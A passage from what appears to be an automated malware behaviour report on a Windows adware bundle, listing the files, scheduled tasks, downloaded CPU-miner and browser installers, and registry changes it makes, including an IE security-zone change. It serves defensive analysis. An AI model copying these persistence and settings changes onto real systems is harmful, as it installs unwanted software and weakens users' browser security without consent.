%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3496\prefs (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762 (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source564_2762\Chrome-bin\crossbrowse.exe (0 bytes)

The process upgmsd_re_005010077.exe:1364 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)

The process nsm25.tmp:240 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw29.tmp (6012 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\checks.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\md5dll.dll (6 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\thankyou[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2A.tmp\md5dll.dll (0 bytes)

The process nst16.tmp:1340 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa19.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv18.tmp (0 bytes)

The process nsh2B.tmp:344 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-A2FKP.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010077\is-9C6SV.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-IFSM2.tmp (2105 bytes)
%Program Files%\gmsd_re_005010077\gamesdesktop_widget.exe (77294 bytes)
%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe (29430 bytes)
%Program Files%\gmsd_re_005010077\unins000.dat (29081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ex.bat (1564 bytes)
%Program Files%\gmsd_re_005010077\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\CheckProc.cmd (288 bytes)
%Program Files%\gmsd_re_005010077\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-VS088.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-V8RVC.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\is-2EA6S.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\itdownload.dll (1281 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\ITDOWNLOAD.DLL (0 bytes)

The process nsh2B.tmp:1860 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp\nsh2B.tmp (3779 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp\nsh2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-Q2DVB.tmp (0 bytes)

The process encrypt.exe:560 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gmsd_re_005010077.exe (31997 bytes)

The process encrypt.exe:1400 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\upgmsd_re_005010077.exe (24223 bytes)

The process encrypt.exe:424 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\predm.exe (1911 bytes)

The process encrypt.exe:460 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-L3ME5.tmp\gamesdesktop_widget.exe (92831 bytes)

The process 3075.exe:976 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3496\prefs (823 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\expedia.ico (1921 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\setup.exe (37305 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\youtube.ico (3913 bytes)
%WinDir%\Tasks\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.job (1668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nfl.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_translate.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\imdb.ico (2993 bytes)
%WinDir%\Tasks\Crossbrowse.job (1982 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\booking.com.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\netflix.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\target.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\cnn.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\priceline.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ted.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tumblr.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bbc.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\twitter.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\chrome.packed.7z (1402273 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\forbes.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].002 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].003 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].001 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail.ru.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].004 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].005 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\linkedin.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\reddit.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yelp.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\amazon.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ebay.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\etsy.ico (3913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\wikipedia.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nba.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gizmodo.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yandex.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nytimes.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\icon.json (21 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bing.ico (1597 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A (0 bytes)
%WinDir%\Tasks\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.job (0 bytes)

The process nsiB.tmp:644 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsjE.tmp (7695 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (0 bytes)

The process nsw7.tmp:1688 makes changes in the file system.


The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp (0 bytes)

The process nst36.tmp:2008 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu39.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu39.tmp (0 bytes)

The process nsw22.tmp:272 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_CPUminer[1].exe (7288 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp (0 bytes)

Registry activity

The process nsg13.tmp:912 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 D9 7D EB 23 7F D5 EC 61 F0 AB E6 E4 1C 3F FD"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

The process %original file name%.exe:1504 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 69 3F DD D8 9D 52 81 D6 47 DB E5 04 8A 52 EA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

